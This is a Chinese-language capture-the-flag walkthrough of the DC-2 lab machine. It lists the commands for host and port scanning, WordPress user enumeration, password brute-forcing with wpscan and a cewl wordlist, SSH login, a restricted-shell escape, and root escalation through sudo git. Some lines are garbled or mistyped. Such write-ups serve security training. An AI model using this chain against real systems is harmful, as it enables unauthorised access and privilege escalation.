一：主机发现

arp-scan -I eth0 10.4.7.0/24

kali ip：10.4.7.128

靶机IP：10.4.7.151

二：端口扫描

nmap -T4 -sV -p- -A 10.4.7.151

三：信息收集

无法访问更改host文件

vim /etc/hosts

通过flag1的提示，我们需要使用cewl爆破出用户名和密码，因为他用wordpress框架搭建，我们先使用wpscan扫描一下，查一下用户名

wpscan --url http://dc-2/ -e u

WPScan是一个用于扫描WordPress网站的工具，可以帮助发现网站的安全漏洞和弱点。以下是一些常用的WPScan参数：

1. -u, --url：指定要扫描的WordPress网站的URL。
2. -f, --force：强制重新扫描网站，即使已经扫描过。
3. -e, --enumerate：枚举网站的信息，如插件、主题、用户等。
4. --plugins-detection：检测网站上安装的插件。
5. --themes-detection：检测网站上安装的主题。
6. --users-detection：检测网站上的用户。
7. --scan：执行完整的漏洞扫描。
8. --wordlist：指定密码破解时使用的字典文件。
9. --proxy：指定使用代理服务器进行扫描。
10. --update：更新WPScan工具到最新版本。

发现三个用户名

admin

jerry

tom

先添加到新创建的用户名字典中

vim user.txt

然后使用cewl生成密码

cewl -w 1.txt http://dc-2/

查看一下7.txt里的内容

cat 1.txt

然后进行密码爆破：

wpscan --ignore-main-redirect --url 10.4.7.151 -U user.txt -P 1.txt --force

ignore-main-redirect是WPScan的一个参数，用于在扫描时忽略主要的重定向。这个参数可以在扫描中排除主要的重定向，以避免影响扫描结果。如果网站有主要的重定向，可以使用这个参数来忽略它，从而更准确地扫描网站的安全性。在使用WPScan时，可以添加--ignore-main-redirect参数来启用这个功能。

扫到两个结果

jerry adipiscing

tom parturient

因为是wordpress搭建的网站，所以访问这个地址

http;//dc-2/wp-admin

登录jerry用户

flag2中提示我们如果不能继续攻击 wordPress就想想其他方法吧，还记得7744端口跑的ssh吗，我们尝试下它。

ssh [email protected] -p 7744

成功进入但是很多命令无法用

使用命令交互shell：

python -c 'import pty;pty.spawn("/bin/bash")'

也不行

利用rbash逃逸，先查看看可以使用的命令 echo $PATH

echo /home/tom/usr/bin/*

rbash是一个受限的shell，通常用于限制用户的操作权限。但是，有时候可能会存在rbash逃逸的漏洞，允许用户绕过这些限制并执行潜在危险的操作。

less、ls、vi命令可以使用

绕过方法：

less绕过：$less test !‘sh’ls

绕过:$man ls !‘sh’vi

绕过:$vi test !/bin/sh 或 !/bin/bash

这里我们使用这种绕过方法：

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
cat flag3.txt

flag3提示我们查看jerry用户。我们切换到jerry用户中。 我们切换到jerry用户当中去

su jerry

flag4告诉我们还没有结束，文中有一个git这是一个很重要的关键词。

四：提权

无法切换到 root目录权限不够，查看下具有root权限的命令

看到了flag4中提示我们的git，我们使用git进行提权

jerry被赋予了特殊的权限，可以无密码使用sudo git

sudo git -p help
!/bin/bash

git提权原理：

因为sudo 的权限具有传递性，相当于root执行了bash 则直接提升至root权限